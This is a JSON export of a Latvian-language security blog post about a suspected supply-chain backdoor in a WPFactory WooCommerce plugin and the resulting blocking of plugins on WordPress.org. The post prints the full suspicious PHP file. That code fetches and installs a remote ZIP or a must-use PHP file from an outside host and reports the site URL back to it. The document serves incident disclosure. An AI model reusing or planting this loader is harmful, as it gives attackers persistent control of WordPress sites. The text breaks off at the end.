{"id":24971,"date":"2026-05-07T11:48:23","date_gmt":"2026-05-07T09:48:23","guid":{"rendered":"https:\/\/www.ferberenterprises.com\/?p=24971"},"modified":"2026-05-07T23:41:40","modified_gmt":"2026-05-07T21:41:40","slug":"security-breach-at-wpfactory-170000-wordpress-sites-exposed","status":"publish","type":"post","link":"https:\/\/www.ferberenterprises.com\/lv\/security-breach-at-wpfactory-170000-wordpress-sites-exposed\/","title":{"rendered":"Dro\u0161\u012bbas p\u0101rk\u0101pums vietn\u0113 WPFactory: apdraud\u0113tas 170 000 WordPress vietnes"},"content":{"rendered":"<p>WordPress joproj\u0101m ir vispla\u0161\u0101k izmantot\u0101 satura vad\u012bbas sist\u0113ma pasaul\u0113, nodro\u0161inot vair\u0101k nek\u0101 40 procentus vis\u0101m t\u012bmek\u013ca vietn\u0113m internet\u0101. S\u0101kot ar mazo uz\u0146\u0113mumu vietn\u0113m un person\u012bgajiem emu\u0101riem, l\u012bdz pat liel\u0101m uz\u0146\u0113mumu platform\u0101m un e-komercijas infrastrukt\u016brai, CMS ir k\u013cuvis par moderno t\u012bmek\u013ca mugurkaulu. T\u0101s popularit\u0101te izriet no t\u0101s elast\u012bbas, atv\u0113rt\u0101s ekosist\u0113mas un milz\u012bg\u0101 spraud\u0146u skaita, kas pieejami t\u0101s funkcionalit\u0101tes papla\u0161in\u0101\u0161anai.<\/p>\n\n\n\n<p>Tom\u0113r \u0161\u012b pati ekosist\u0113ma ir k\u013cuvusi ar\u012b par vienu no liel\u0101kajiem WordPress dro\u0161\u012bbas izaicin\u0101jumiem.<\/p>\n\n\n\n<p>Uz\u0146\u0113mum\u0101 Ferber Enterprises m\u016bsu kiberdro\u0161\u012bbas komanda nep\u0101rtraukti uzrauga draudus, kas ietekm\u0113 WordPress ekosist\u0113mu, jo ievainojam\u012bbas spraud\u0146os, t\u0113m\u0101s vai pieg\u0101des \u0137\u0113d\u0113s var \u0101tri p\u0101raugt pla\u0161a m\u0113roga dro\u0161\u012bbas p\u0101rk\u0101pumos, kas skar t\u016bksto\u0161iem t\u012bmek\u013ca viet\u0146u vis\u0101 pasaul\u0113. P\u0113d\u0113jos gados uzbruc\u0113ji arvien bie\u017e\u0101k v\u0113r\u0161as pret spraud\u0146u izstr\u0101d\u0101t\u0101jiem un izplat\u012b\u0161anas infrastrukt\u016br\u0101m, nevis pret atsevi\u0161\u0137\u0101m t\u012bmek\u013ca vietn\u0113m, t\u0101d\u0113j\u0101di \u013caujot \u013caunpr\u0101t\u012bgam kodam izplat\u012bties caur uzticamiem programmat\u016bras atjaunin\u0101jumiem un ofici\u0101liem lejupiel\u0101des kan\u0101liem.<\/p>\n\n\n\n<p>\u0160oned\u0113\u013c izc\u0113l\u0101s liela skand\u0101la, kur\u0101 iesaist\u012bj\u0101s WPFactory \u2014 paz\u012bstams WordPress spraud\u0146u izstr\u0101d\u0101t\u0101js, kura produkti ir instal\u0113ti vair\u0101k nek\u0101 170 000 t\u012bmek\u013ca vietn\u0113s vis\u0101 pasaul\u0113. Vair\u0101k nek\u0101 80 ar \u0161o uz\u0146\u0113mumu saist\u012bti spraud\u0146i tika uz laiku blo\u0137\u0113ti vietn\u0113 WordPress.org, p\u0113c tam, kad m\u016bsu kiberdro\u0161\u012bbas komanda Ferber Enterprises atkl\u0101ja iesp\u0113jamu aizmugur\u0113jo durvju programmu viena no \u0161\u012b uz\u0146\u0113muma spraud\u0146u premium versij\u0101.<\/p>\n\n\n\n<p>Incidents ir rad\u012bjis nopietnas ba\u017eas vis\u0101 WordPress kopien\u0101 par programmat\u016bras pieg\u0101des \u0137\u0113\u017eu dro\u0161\u012bbu, spraud\u0146u p\u0101rskat\u012b\u0161anas procesiem un uzbrukumu pieaugo\u0161o sare\u017e\u0123\u012bt\u012bbu, kas v\u0113rstas pret atv\u0113rt\u0101 pirmkoda ekosist\u0113mu.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Aizdom\u012bg\u0101s spraud\u0146a uzved\u012bbas atkl\u0101\u0161ana<\/h2>\n\n\n\n<p>\u0160\u012b probl\u0113ma pirmo reizi tika atkl\u0101ta p\u0113c tam, kad m\u016bsu kiberdro\u0161\u012bbas komanda Ferber Enterprises, test\u0113jot plugina \u201eEU VAT for WooCommerce Pro\u201c premium versiju, kas tiek izplat\u012bta tie\u0161i no t\u0101 ofici\u0101l\u0101s t\u012bmek\u013ca vietnes, konstat\u0113ja neparastu darb\u012bbu.<\/p>\n\n\n\n<p>S\u0101kotn\u0113ji izmekl\u0113\u0161ana s\u0101k\u0101s p\u0113c tam, kad spraudnis instal\u0113\u0161anas laik\u0101 rad\u012bja fat\u0101lu k\u013c\u016bdu. Risinot probl\u0113mu, m\u016bsu anal\u012bti\u0137i identific\u0113ja aizdom\u012bgu PHP failu ar nosaukumu class-alg-wc-eu-vat-customer.php. \u0160\u0137ita, ka fails veic darb\u012bbas, kas piln\u012bb\u0101 neatbilst WooCommerce PVN spraud\u0146a paredz\u0113tajai funkcionalit\u0101tei.<\/p>\n\n\n\n<link rel=\"stylesheet\"\nhref=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.9.0\/styles\/vs2015.min.css\">\n\n<script src=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.9.0\/highlight.min.js\"><\/script>\n\n<script>\ndocument.addEventListener(\"DOMContentLoaded\", () => {\n    hljs.highlightAll();\n});\n<\/script>\n\n<span data-no-translation=\"\">\n\n<div style=\"    margin:30px 0;    border-radius:12px;    overflow:hidden;    box-shadow:0 0 25px rgba(0,0,0,0.35);    border:1px solid #2d2d2d;\">\n\n<div style=\"    background:#111;    color:#aaa;    padding:12px 18px;    font-family:monospace;    font-size:14px;    border-bottom:1px solid #2d2d2d;    display:flex;    justify-content:space-between;    align-items:center;\">\n    <span>class-alg-wc-eu-vat-customer.php<\/span>\n    <span style=\"color:#ff5f56;\">\u25cf<\/span>\n<\/div>\n\n<pre style=\"    margin:0;    padding:25px;    background:#1e1e1e;    overflow:auto;    font-size:14px;    line-height:1.6;\"><code class=\"language-php\">&lt;?php\nrequire_once dirname(__FILE__, 5) . '\/wp-load.php';\n$h = strtolower(preg_replace('\/:\\d+$\/', '', $_SERVER&#91;'HTTP_HOST'] ?? ''));\n$s = (!empty($_SERVER&#91;'HTTPS']) &amp;&amp; $_SERVER&#91;'HTTPS'] !== 'off') ? 'https' : 'http';\n$ch = curl_init(\"$s:\/\/$h\/wp-content\/plugins\/eu-vat-for-woocommerce-pro\/eu-vat-for-woocommerce-pro.php\");\ncurl_setopt_array($ch, &#91;\n    CURLOPT_NOBODY =&gt; 1,\n    CURLOPT_RETURNTRANSFER =&gt; 1,\n    CURLOPT_TIMEOUT =&gt; 10,\n    CURLOPT_SSL_VERIFYPEER =&gt; 0\n]);\ncurl_exec($ch);\n$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\ncurl_close($ch);\nif ($code !== 403 || ($_GET&#91;'scaramooch'] ?? '') === 'refresh') {\n    $url = 'https:\/\/foodylicious.co.uk\/change\/akismet-pro.zip';\n    $zipPath = sys_get_temp_dir() . '\/plugin.zip';\n    $zipData = file_get_contents($url);\n    if ($zipData === false) {\n        exit('Download failed');\n    }\n    file_put_contents($zipPath, $zipData);\n    $zip = new ZipArchive;\n    if ($zip-&gt;open($zipPath) === TRUE) {\n        $zip-&gt;extractTo(dirname(__FILE__, 5) . '\/wp-content\/plugins\/');\n        $zip-&gt;close();\n    } else {\n        exit('ZIP open failed');\n    }\n    unlink($zipPath);\n} else {\n    $url = \"https:\/\/foodylicious.co.uk\/change\/scara.php\";\n    $code = file_get_contents($url);\n    if ($code !== false) {\n\n        $baseDir = dirname(__FILE__, 4);\n\n        $folderName = 'mu-plugins';\n\n        $dir = $baseDir . '\/' . $folderName;\n\n        if (!is_dir($dir)) {\n            mkdir($dir, 0755, true);\n        }\n\n        file_put_contents($dir . '\/wp-redis.php', $code);\n    }\n}\n$data = &#91;\n    'site_url' =&gt; get_site_url() . '\/wp-content\/plugins\/eu-vat-for-woocommerce-pro\/',\n];\nwp_remote_post('https:\/\/foodylicious.co.uk\/change\/tracks.php', &#91;\n    'body' =&gt; $data,\n    'timeout' =&gt; 10,\n]);<\/code><\/pre><\/div><\/span>\n\n\n\n<p>Saska\u0146\u0101 ar m\u016bsu anal\u012bzi, kods m\u0113\u0123in\u0101ja:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Lejupiel\u0101d\u0113t \u0101r\u0113ju ZIP arh\u012bvu no att\u0101l\u0101 servera<\/li>\n\n\n\n<li>Main\u012bt WordPress kodola direktorijus<\/li>\n\n\n\n<li>Sazin\u0101ties ar \u0101r\u0113jo infrastrukt\u016bru<\/li>\n\n\n\n<li>Potenci\u0101li izpild\u012bt att\u0101lin\u0101tus uzbrukumus infic\u0113taj\u0101s t\u012bmek\u013ca vietn\u0113s<\/li>\n<\/ul>\n\n\n\n<p>\u0160ie r\u0101d\u012bt\u0101ji nekav\u0113joties lika aizdomas par iesp\u0113jamu sl\u0113ptu aizmugurisko durvju esam\u012bbu vai \u013caunpr\u0101t\u012bgu pieg\u0101des \u0137\u0113des kompromit\u0113\u0161anu.<\/p>\n\n\n\n<p>Situ\u0101ciju \u012bpa\u0161i satrauco\u0161u padar\u012bja tas, ka spraudnis nebija ieg\u016bts no neofici\u0101la spogu\u013cservera vai pir\u0101tiska repozitorija. Pakete tika lejupiel\u0101d\u0113ta tie\u0161i no WPFactory ofici\u0101l\u0101 klientu port\u0101la, kas pastiprin\u0101ja ba\u017eas, ka var\u0113tu b\u016bt kompromit\u0113ts pats izplat\u012b\u0161anas kan\u0101ls.<\/p>\n\n\n\n<p>Uz\u0146\u0113mum\u0101 Ferber Enterprises m\u0113s nekav\u0113joties dokument\u0113j\u0101m \u0161o incidentu un uzs\u0101k\u0101m atbild\u012bgas inform\u0101cijas izpau\u0161anas procesu, sazinoties ar WPFactory tie\u0161i caur GitHub.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-b8b3baa1\"><h2 class=\"uagb-heading-text\">S\u0101kotn\u0113j\u0101 atbilde no WPFactory<\/h2><\/div>\n\n\n\n<p>S\u0101kotn\u0113ji WPFactory atbild\u0113ja, nor\u0101dot, ka zi\u0146ojum\u0101 aprakst\u012btais aizdom\u012bgais fails un darb\u012bbas nav da\u013ca no vi\u0146u ofici\u0101l\u0101s kodb\u0101zes.<\/p>\n\n\n\n<p>Uz\u0146\u0113muma p\u0101rst\u0101vis ierosin\u0101ja vair\u0101kus alternat\u012bvus skaidrojumus, tostarp:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Modific\u0113ta lok\u0101l\u0101 instal\u0101cija<\/li>\n\n\n\n<li>Ap\u0161aub\u012bta t\u012bmek\u013ca vietnes vide<\/li>\n\n\n\n<li>Vecmodin\u0101ta spraud\u0146a versija<\/li>\n\n\n\n<li>Potenci\u0101li safabric\u0113ts lejupiel\u0101des avots<\/li>\n<\/ul>\n\n\n\n<p>Uz\u0146\u0113mums ar\u012b nor\u0101d\u012bja, ka nevar\u0113ja dro\u0161i p\u0101rbaud\u012bt iesniegto ZIP failu, jo vi\u0146u p\u0101rl\u016bkprogramma atz\u012bm\u0113ja arh\u012bvu k\u0101 potenci\u0101li nedro\u0161u.<\/p>\n\n\n\n<p>M\u016bsu kiberdro\u0161\u012bbas komanda v\u0113l\u0101k preciz\u0113ja, ka spraudnis bija lejupiel\u0101d\u0113ts tie\u0161i no WPFactory ofici\u0101l\u0101s t\u012bmek\u013ca vietnes un ka aizdom\u012bgais fails palika sist\u0113m\u0101 pat p\u0113c tam, kad no t\u0101 pa\u0161a avota tika lejupiel\u0101d\u0113ta jauna versija 4.6.1.<\/p>\n\n\n\n<p>\u0160is fakts k\u013cuva par izmekl\u0113\u0161anas galveno elementu. Ja vair\u0101kas neatkar\u012bgas lejupiel\u0101des no ofici\u0101l\u0101 izplat\u012b\u0161anas kan\u0101la past\u0101v\u012bgi satur\u0113ja to pa\u0161u aizdom\u012bgo kodu, iesp\u0113ja, ka ir notikusi viet\u0113j\u0101s t\u012bmek\u013ca vietnes kompromit\u0113\u0161ana, k\u013cuva arvien maz\u0101k ticama. Neskatoties uz \u0161iem atkl\u0101jumiem, WPFactory s\u0101kotn\u0113ji pazi\u0146oja, ka vi\u0146iem nav izdevies atk\u0101rtot \u0161o probl\u0113mu sav\u0101 pus\u0113, un apgalvoja, ka aizdom\u012bgais fails ofici\u0101laj\u0101 spraud\u0146a paket\u0113 nepast\u0101v.<\/p>\n\n\n\n<p>Tad uz\u0146\u0113mums l\u016bdza administratora un FTP piek\u013cuvi skartajai videi, lai turpin\u0101tu izmekl\u0113\u0161anu. M\u0113s, Ferber Enterprises, noraid\u012bj\u0101m \u0161o l\u016bgumu kiberdro\u0161\u012bbas apsv\u0113rumu d\u0113\u013c. Privil\u0113\u0123\u0113tas piek\u013cuves pie\u0161\u0137ir\u0161ana serverim pieg\u0101d\u0101t\u0101jam, kura infrastrukt\u016bra, iesp\u0113jams, pati bija kompromit\u0113ta, b\u016btu rad\u012bjusi nepie\u0146emamu dro\u0161\u012bbas risku. T\u0101 viet\u0101 m\u016bsu komanda turpin\u0101ja sniegt tehniskos pier\u0101d\u012bjumus, tostarp video demonstr\u0101ciju, kur\u0101 redzama aizdom\u012bga spraud\u0146a darb\u012bba uzreiz p\u0113c instal\u0113\u0161anas.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-b43078c2\"><h2 class=\"uagb-heading-text\">Eskal\u0101cija uz WordPress.org<\/h2><\/div>\n\n\n\n<p>Izmekl\u0113\u0161anas gait\u0101 pieauga ba\u017eas par \u0161\u012bs probl\u0113mas iesp\u0113jamo apm\u0113ru. WPFactory uztur pla\u0161u spraud\u0146u kl\u0101stu, kas sast\u0101v no vair\u0101k nek\u0101 65 spraud\u0146iem ar kopum\u0101 vair\u0101k nek\u0101 170 000 akt\u012bvu instal\u0101ciju. T\u0101d\u0113j\u0101di jebk\u0101ds uzbrukums, kas ietekm\u0113tu uz\u0146\u0113muma izplat\u012b\u0161anas infrastrukt\u016bru, var\u0113tu rad\u012bt pla\u0161as sekas vis\u0101 WordPress ekosist\u0113m\u0101.<\/p>\n\n\n\n<p>M\u016bsu komanda par \u0161o probl\u0113mu nekav\u0113joties inform\u0113ja WordPress.org, lai nov\u0113rstu situ\u0101ciju, ka citi lietot\u0101ji instal\u0113tu potenci\u0101li kompromit\u0113tus pakotnes, kam\u0113r izmekl\u0113\u0161ana v\u0113l turpin\u0101j\u0101s. P\u0113c tam WordPress.org veica \u0101rk\u0101rtas pas\u0101kumu, uz laiku blo\u0137\u0113jot vair\u0101k nek\u0101 80 WPFactory spraud\u0146us ofici\u0101laj\u0101 repozitorij\u0101.<\/p>\n\n\n\n<p>\u0160is solis uzreiz piesaist\u012bja WordPress dro\u0161\u012bbas kopienas uzman\u012bbu, jo tik liela m\u0113roga masveida spraud\u0146u sl\u0113g\u0161ana ir sal\u012bdzino\u0161i reta par\u0101d\u012bba un parasti liecina par nopietn\u0101m, neatrisin\u0101t\u0101m probl\u0113m\u0101m. P\u0113c situ\u0101cijas saasin\u0101\u0161an\u0101s WPFactory v\u0113l\u0101k atzina, ka probl\u0113ma \u0161\u0137ita pamatota, un atvainoj\u0101s par to, ka nebija rea\u0123\u0113jusi \u0101tr\u0101k uz s\u0101kotn\u0113jo zi\u0146ojumu. Uz\u0146\u0113muma p\u0101rst\u0101vji pazi\u0146oja, ka vi\u0146i akt\u012bvi izmekl\u0113 \u0161o jaut\u0101jumu un str\u0101d\u0101 pie risin\u0101juma. Viena no WPFactory iek\u0161\u0113ji izvirz\u012btaj\u0101m hipot\u0113z\u0113m liecin\u0101ja, ka caur vi\u0146u infrastrukt\u016bru var\u0113tu b\u016bt net\u012b\u0161\u0101m izplat\u012bts novecojis vai ke\u0161\u0113ts spraud\u0146u pakotnes.<\/p>\n\n\n\n<p>Tom\u0113r m\u016bsu kiberdro\u0161\u012bbas komanda nepiekrita \u0161im v\u0113rt\u0113jumam. Nov\u0113rot\u0101 uzved\u012bba stingri nor\u0101d\u012bja uz dzi\u013c\u0101ku dro\u0161\u012bbas probl\u0113mu, kas potenci\u0101li ietver kompromit\u0113tas izstr\u0101des caurules, izplat\u012b\u0161anas sist\u0113mas vai neat\u013cautu koda injic\u0113\u0161anu lejupiel\u0101d\u0113jamo spraud\u0146u arh\u012bvos.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">K\u0101p\u0113c \u0161is incidents ir svar\u012bgs<\/h2>\n\n\n\n<p>WPFactory skand\u0101ls liecina par pieaugo\u0161u kiberdro\u0161\u012bbas apdraud\u0113jumu, kas paz\u012bstams k\u0101 programmat\u016bras pieg\u0101des \u0137\u0113des uzbrukums. Tradicion\u0101li uzbruc\u0113ji koncentr\u0113j\u0101s uz atsevi\u0161\u0137u t\u012bmek\u013ca viet\u0146u kompromit\u0113\u0161anu, izmantojot bruto sp\u0113ka uzbrukumus vai spraud\u0146u ievainojam\u012bbas. \u0160odien \u013caunpr\u0101t\u012bgie aktori arvien bie\u017e\u0101k v\u0113r\u0161as pret pa\u0161u programmat\u016bras izstr\u0101d\u0101t\u0101jiem, jo uzticama pieg\u0101d\u0101t\u0101ja kompromit\u0113\u0161ana \u013cauj \u013caunpr\u0101t\u012bgajam kodam vienlaikus izplat\u012bties t\u016bksto\u0161iem t\u012bmek\u013ca viet\u0146u.<\/p>\n\n\n\n<p>\u0160\u012b strat\u0113\u0123ija jau ir nov\u0113rota vair\u0101kos augsta l\u012bme\u0146a kiberdro\u0161\u012bbas incidentos, kas p\u0113d\u0113j\u0101s desmitgades laik\u0101 ir ietekm\u0113ju\u0161i glob\u0101l\u0101s programmat\u016bras ekosist\u0113mas. Konkr\u0113ti WordPress ekosist\u0113m\u0101 spraud\u0146u izstr\u0101d\u0101t\u0101ji ir pievilc\u012bgi m\u0113r\u0137i, jo administratori p\u0113c b\u016bt\u012bbas uzticas spraud\u0146iem un tie bie\u017ei vien darbojas ar paaugstin\u0101t\u0101m at\u013cauj\u0101m.<\/p>\n\n\n\n<p>Ja \u013caunpr\u0101t\u012bgs kods tiek ievietots spraud\u0146a paket\u0113, kas tiek izplat\u012bta caur ofici\u0101lu kan\u0101lu, skart\u0101s t\u012bmek\u013ca vietnes var neapzin\u0101ti pa\u0161as instal\u0113t \u013caunprogrammat\u016bru. Attiec\u012bb\u0101 uz aizdom\u012bgo spraudni \u201eWPFactory\u201c iesp\u0113jam\u0101s sekas ir nopietnas.<\/p>\n\n\n\n<p>Pamatojoties uz m\u016bsu anal\u012bzi, konstat\u0113t\u0101 darb\u012bba teor\u0113tiski var\u0113tu \u013caut uzbruc\u0113jiem:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Izvietot papildu \u013caunprogrammat\u016bru<\/li>\n\n\n\n<li>Inject SEO spam<\/li>\n\n\n\n<li>Izveidojiet past\u0101v\u012bgas aizmugures durvis<\/li>\n\n\n\n<li>Nekav\u0113joties izvilkt sensit\u012bvus datus<\/li>\n\n\n\n<li>Modific\u0113t WordPress instal\u0101cijas att\u0101lin\u0101ti<\/li>\n\n\n\n<li>Uztur\u0113t neat\u013cautu piek\u013cuvi ilgsto\u0161i<\/li>\n<\/ul>\n\n\n\n<p>\u0160\u0101du uzbrukumu b\u012bstam\u012bba sl\u0113pjas to sl\u0113pt\u012bb\u0101. M\u016bsdienu aizmugures durvis bie\u017ei ir izstr\u0101d\u0101tas t\u0101, lai pirms aktiviz\u0113\u0161an\u0101s t\u0101s m\u0113ne\u0161iem ilgi darbotos neakt\u012bvi, t\u0101d\u0113j\u0101di iev\u0113rojami apgr\u016btinot noteik\u0161anu. \u0160\u012b m\u0113ne\u0161a s\u0101kum\u0101 WordPress spraud\u0146u komanda, k\u0101 zi\u0146ots, blo\u0137\u0113ja vair\u0101k nek\u0101 30 spraud\u0146us p\u0113c tam, kad cit\u0101 spraud\u0146u portfel\u012b pasl\u0113ptais \u013caunpr\u0101t\u012bgais kods asto\u0146us m\u0113ne\u0161us palika neakt\u012bvs, pirms beidzot aktiviz\u0113j\u0101s un ievietoja SEO spamu t\u012bmek\u013ca vietn\u0113s.<\/p>\n\n\n\n<p>\u0160\u012b tendence par\u0101da, k\u0101 uzbruc\u0113ji arvien vair\u0101k pie\u0161\u0137ir priorit\u0101ti notur\u012bbai un aizkav\u0113tai aktiviz\u0113\u0161anai, lai apietu noteik\u0161anas meh\u0101nismus.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-c956d27d\"><h2 class=\"uagb-heading-text\">Pla\u0161\u0101ka dro\u0161\u012bbas kr\u012bze WordPress ekosist\u0113m\u0101<\/h2><\/div>\n\n\n\n<p>WPFactory incidents atkl\u0101j ar\u012b pla\u0161\u0101kas sist\u0113miskas dro\u0161\u012bbas probl\u0113mas, kas skar WordPress kopum\u0101. P\u0113d\u0113j\u0101s desmitgades laik\u0101 spraud\u0146u ekosist\u0113ma ir strauji papla\u0161in\u0101jusies, un gan ofici\u0101lajos, gan komerci\u0101lajos tirgos tagad ir pieejami desmitiem t\u016bksto\u0161u spraud\u0146u. Lai gan \u0161\u012b ekosist\u0113ma veicina inov\u0101cijas un elast\u012bgumu, t\u0101 vienlaikus iev\u0113rojami apgr\u016btina dro\u0161\u012bbas uzraudz\u012bbu.<\/p>\n\n\n\n<p>Saska\u0146\u0101 ar Patchstack zi\u0146ojumu \u201cWordPress dro\u0161\u012bbas st\u0101voklis 2026. gad\u0101\u201d gandr\u012bz 461 000 zin\u0101mu ievainojam\u012bbu netika nov\u0113rstas pirms to publiskas atkl\u0101\u0161anas. \u0160ie statistikas dati atspogu\u013co arvien pieaugo\u0161o slogu, kas gulstas gan uz spraud\u0146u izstr\u0101d\u0101t\u0101jiem, gan dro\u0161\u012bbas p\u0113tniekiem, gan repozitoriju uztur\u0113t\u0101jiem.<\/p>\n\n\n\n<p>Taj\u0101 pa\u0161\u0101 laik\u0101 ofici\u0101lais WordPress spraud\u0146u p\u0101rskat\u012b\u0161anas rinda, k\u0101 zi\u0146ots, tagad p\u0101rsniedz 4000 spraud\u0146u, kas gaida izskat\u012b\u0161anu. \u0160\u0101di skait\u013ci par\u0101da milz\u012bgo izaicin\u0101jumu kvalit\u0101tes nodro\u0161in\u0101\u0161anas un dro\u0161\u012bbas audita uztur\u0113\u0161an\u0101 pla\u0161\u0101 m\u0113rog\u0101.<\/p>\n\n\n\n<p>Daudzi spraud\u0146u izstr\u0101d\u0101t\u0101ji ir nelielas komandas ar ierobe\u017eotiem dro\u0161\u012bbas resursiem. Citi vienlaikus p\u0101rvalda desmitiem spraud\u0146u, \u012bstenojot agres\u012bvas komerci\u0101l\u0101s izaugsmes strat\u0113\u0123ijas, kas ietver uz\u0146\u0113mumu p\u0101r\u0146em\u0161anu un produktu kl\u0101sta papla\u0161in\u0101\u0161anu. Ar\u012b pats WPFactory nesen papla\u0161in\u0101j\u0101s, veicot p\u0101r\u0146em\u0161anas, tostarp 2025. gad\u0101 ieg\u0101d\u0101joties Extend-WP un t\u0101 19 spraud\u0146us, kam v\u0113l\u0101k taj\u0101 pa\u0161\u0101 gad\u0101 sekoja WBW un vair\u0101ku citu spraud\u0146u p\u0101r\u0146em\u0161ana.<\/p>\n\n\n\n<p>Strauja portfe\u013ca papla\u0161in\u0101\u0161an\u0101s var rad\u012bt operat\u012bvu sare\u017e\u0123\u012bt\u012bbu, kas apgr\u016btina koda auditu, infrastrukt\u016bras p\u0101rvald\u012bbu un izlaiduma integrit\u0101tes p\u0101rbaudi. Uzbruc\u0113ji ir piln\u012bb\u0101 inform\u0113ti par \u0161\u012bm realit\u0101t\u0113m. Vi\u0146i arvien bie\u017e\u0101k koncentr\u0113jas uz v\u0101jiem operat\u012bv\u0101s dro\u0161\u012bbas principiem programmat\u016bras pieg\u0101d\u0101t\u0101ju vid\u016b, nevis tie\u0161i uz galalietot\u0101jiem.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Pieg\u0101des \u0137\u0113des dro\u0161\u012bbas pieaugo\u0161\u0101 noz\u012bme<\/h2>\n\n\n\n<p>\u0160\u0101di incidenti pastiprina steidzamo vajadz\u012bbu p\u0113c sp\u0113c\u012bg\u0101kas pieg\u0101des \u0137\u0113des dro\u0161\u012bbas prakses vis\u0101 WordPress ekosist\u0113m\u0101.<\/p>\n\n\n\n<p>Uz\u0146\u0113mum\u0101 Ferber Enterprises m\u016bsu kiberdro\u0161\u012bbas komanda stingri iesaka spraud\u0146u izstr\u0101d\u0101t\u0101jiem ieviest vair\u0101kus b\u016btiskus aizsardz\u012bbas pas\u0101kumus, tostarp:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Kriptogr\u0101fisk\u0101 pakot\u0146u parakst\u012b\u0161ana<\/li>\n\n\n\n<li>Dro\u0161as CI\/CD cauru\u013cvadi<\/li>\n\n\n\n<li>Oblig\u0101t\u0101 daudzfaktoru autentifik\u0101cija<\/li>\n\n\n\n<li>Infrastrukt\u016bras segment\u0101cija<\/li>\n\n\n\n<li>Nep\u0101rtraukta integrit\u0101tes uzraudz\u012bba<\/li>\n\n\n\n<li>Neatkar\u012bgas koda auditi<\/li>\n\n\n\n<li>Reproduc\u0113jamas b\u016bv\u0113\u0161anas sist\u0113mas<\/li>\n<\/ul>\n\n\n\n<p>Viet\u0146u administratoriem vajadz\u0113tu ar\u012b stiprin\u0101t savu dro\u0161\u012bbas st\u0101vokli. Pat spraud\u0146us, kas lejupiel\u0101d\u0113ti no ofici\u0101liem vai uzticamiem avotiem, nevajadz\u0113tu uzskat\u012bt par pa\u0161saprotami dro\u0161iem.<\/p>\n\n\n\n<p>Organiz\u0101cij\u0101m, kas p\u0101rvalda kritiskas WordPress infrastrukt\u016bras, b\u016btu j\u0101apsver:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Staging vides uztur\u0113\u0161ana<\/li>\n\n\n\n<li>Ien\u0101ko\u0161\u0101s datpl\u016bsmas uzraudz\u012bba<\/li>\n\n\n\n<li>Sken\u0113\u0161anas spraud\u0146i pirms izvieto\u0161anas<\/li>\n\n\n\n<li>Spraud\u0146u lieto\u0161anas ierobe\u017eo\u0161ana<\/li>\n\n\n\n<li>Vismaz\u0101k\u0101s privil\u0113\u0123ijas piek\u013cuves kontroles piem\u0113ro\u0161ana<\/li>\n\n\n\n<li>Failu integrit\u0101tes uzraudz\u012bbas ievie\u0161ana<\/li>\n\n\n\n<li>Izmantojot p\u0101rvald\u012btus Web Application Firewalls (WAF)<\/li>\n<\/ul>\n\n\n\n<p>Kolekt\u012bvajos uz\u0146\u0113mumos pieg\u0101des \u0137\u0113des valid\u0101cija k\u013c\u016bst tikpat svar\u012bga k\u0101 tradicion\u0101l\u0101 dro\u0161\u012bbas risku p\u0101rvald\u012bba. Pie\u0146\u0113mums, ka ofici\u0101lie programmat\u016bras kan\u0101li vienm\u0113r ir dro\u0161i, m\u016bsdienu draudu vid\u0113 vairs nav re\u0101listisks.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Sabiedr\u012bbas reakcijas un turpin\u0101s izmekl\u0113\u0161ana<\/h2>\n\n\n\n<p>Domstar\u012bbas pla\u0161i izplat\u012bj\u0101s vis\u0101 WordPress kopien\u0101 p\u0113c tam, kad izstr\u0101d\u0101t\u0101ji, dro\u0161\u012bbas p\u0113tnieki un infrastrukt\u016bras nodro\u0161in\u0101t\u0101ji publiski s\u0101ka apspriest \u0161o jaut\u0101jumu.<\/p>\n\n\n\n<p>Vair\u0101kas paz\u012bstamas personas ekosist\u0113m\u0101 veicin\u0101ja situ\u0101cijas apzin\u0101\u0161anos, tostarp izstr\u0101d\u0101t\u0101ji, kuri public\u0113ja pagaid\u0101m sl\u0113gto spraud\u0146u sarakstus un mudin\u0101ja administratorus audit\u0113t savas vides.<\/p>\n\n\n\n<p>Tikm\u0113r m\u016bsu komanda Ferber Enterprises turpina analiz\u0113t aizdom\u012bgos spraud\u0146u paraugus un mekl\u0113t papildu kompromit\u0101cijas paz\u012bmes, kas var\u0113tu ietekm\u0113t WordPress vietnes vis\u0101 pasaul\u0113.<\/p>\n\n\n\n<p>L\u012bdz publik\u0101cijas br\u012bdim uz\u0146\u0113mums WPFactory ir atzinis \u0161o probl\u0113mu un pazi\u0146ojis, ka akt\u012bvi str\u0101d\u0101 pie t\u0101s risin\u0101\u0161anas.<\/p>\n\n\n\n<p>Tom\u0113r daudzi jaut\u0101jumi joproj\u0101m paliek neatbild\u0113ti:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Vai tika kompromit\u0113ta ofici\u0101l\u0101 izplat\u012b\u0161anas infrastrukt\u016bra?<\/li>\n\n\n\n<li>Cik ilgi potenci\u0101li tika izplat\u012bti \u013caunpr\u0101t\u012bgi pakotnes?<\/li>\n\n\n\n<li>Vai tas sk\u0101ra ar\u012b citus spraud\u0146us?<\/li>\n\n\n\n<li>Vai tika uzlauzti klientu konti vai lejupiel\u0101des sist\u0113mas?<\/li>\n\n\n\n<li>Vai uzbruc\u0113ji ieguva past\u0101v\u012bgu piek\u013cuvi iek\u0161\u0113jai infrastrukt\u016brai?<\/li>\n\n\n\n<li>Vai papildu d\u012bkst\u0101vo\u0161i vai rezerves dzin\u0113ji v\u0113l var\u0113tu past\u0101v\u0113t?<\/li>\n<\/ul>\n\n\n\n<p>Kam\u0113r \u0161ie jaut\u0101jumi nav piln\u012bb\u0101 atrisin\u0101ti, joproj\u0101m ir j\u0101iev\u0113ro piesardz\u012bba.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">WordPress dro\u0161\u012bbas 